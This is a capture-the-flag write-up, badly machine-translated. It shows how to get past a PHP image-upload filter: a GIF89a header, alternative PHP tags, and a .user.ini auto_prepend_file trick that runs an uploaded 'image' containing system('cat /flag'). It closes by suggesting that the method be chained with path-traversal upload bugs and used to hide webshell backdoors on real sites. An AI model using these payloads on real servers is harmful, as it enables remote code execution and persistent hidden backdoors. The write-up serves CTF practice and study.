0x01 Title Description
Open the page web found to be a uploaded
1, we just try to upload a php file
the wrong name suffix
2, we try to upload pictures
Here you can guess is exif_imagetype()
a function of judgment is not a picture, to bypass this well, add a picture header in the file header can be, for example, gif
the header GIF89a
3, we add in the picture php
code.
Which can not contain pictures <?
, we can bypass with other statements
<script language=”php”>xxx</script>
<% xxx %>
<? xxx ?>
0x02 ideas cleanup
1 file can not be uploaded with <? A
2, uploaded files must contain a picture header
Solution, we can first upload a .user.ini go, used to resolve images with php code, you can achieve the purpose of bypassing restrictions.
Upload pictures a.gif
of code contained
GIF89a
<script language='php'>system('cat /flag');</script>
Upload .user.ini
code
GIF89a
auto_prepend_file=a.gif
auto_prepend_file=a.gif
This sentence is equivalent to all php files in the current folder will be includeda.gif
0x03 answer
After uploading the two files show
us direct access to the upload directory of index.php
the topic and people can access a deliberately set in the upload directory php
file, so it can contain pictures I upload the code, but in reality instances are rare.
0x04 .user.ini possibility of combat use
As described above .user.ini
using the following conditions:
- Server scripting language PHP
- The server uses CGI / FastCGI mode
- php file upload directory to have executable under
From this point of view .user.ini
than the .htaccess
range of applications to a wide, after all, .htaccess
can only be usedApache
But a closer scrutiny we will feel "under the upload directory to have executable file php" This requires the file upload is also more demanding, there should be no genius developers will upload files in your home directory or the php
files in a folder to upload .
But it is not no way, if we cooperate with other vulnerabilities according to the actual situation of use may be miraculous, some time ago I met a CMS
not detected when the upload path ../
, thus resulting files can be uploaded to any directory, in which case we it is very likely you can use.user.ini
In addition, the .user.ini
use of hidden in the back door should be a good use of the method, in the presence of our directory php files left behind .user.ini
and our horse pictures, so that to achieve the purpose of hiding the back door.